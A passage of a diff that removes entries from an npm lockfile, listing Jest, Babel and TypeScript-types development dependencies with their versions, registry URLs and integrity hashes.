"sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^2.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.0.tgz", - "integrity": "sha512-+n8dL/9GWblDO0iU6eZAwEIJVr5DWigtle+Q6HLOrh/pdbXOhOtqzq8VPPE2zvNJzSKY4vH/z3iT3tn0A3ypiQ==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.18.3", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.18.3.tgz", - "integrity": "sha512-1kbcJ40lLB7MHsj39U4Sh1uTd2E7rLEa79kmDpI6cy+XiXsteB3POdQomoq4FxszMrO3ZYchkhYJw7A2862b3w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.3.0" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "18.11.18", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.11.18.tgz", - "integrity": "sha512-DHQpWGjyQKSHj3ebjFI/wRKcqQcdR+MoFBygntYOZytCqNfkd2ZC4ARDJ2DQqhjH5p85Nnd3jhUJIXrszFX/JA==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.5", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.5.tgz", - "integrity": "sha512-tUkiguQGW7S3IhB7N+c2MV/HZPSCPAAiYBZXLsBhFB/PCy6ZKKsZrmBayHV9fdGV/ARIfJ14NkxKzRDjvp7L6w==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001449", - "electron-to-chromium": "^1.4.284", - "node-releases": "^2.0.8", - "update-browserslist-db": "^1.0.10" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001450", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001450.tgz", - "integrity": "sha512-qMBmvmQmFXaSxexkjjfMvD5rnDL0+m+dUMZKoDYsGG8iZN29RuYh9eRoMvKsT6uMAWlyUUGDEQGJJYjzCIO9ew==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.284", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", - "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": 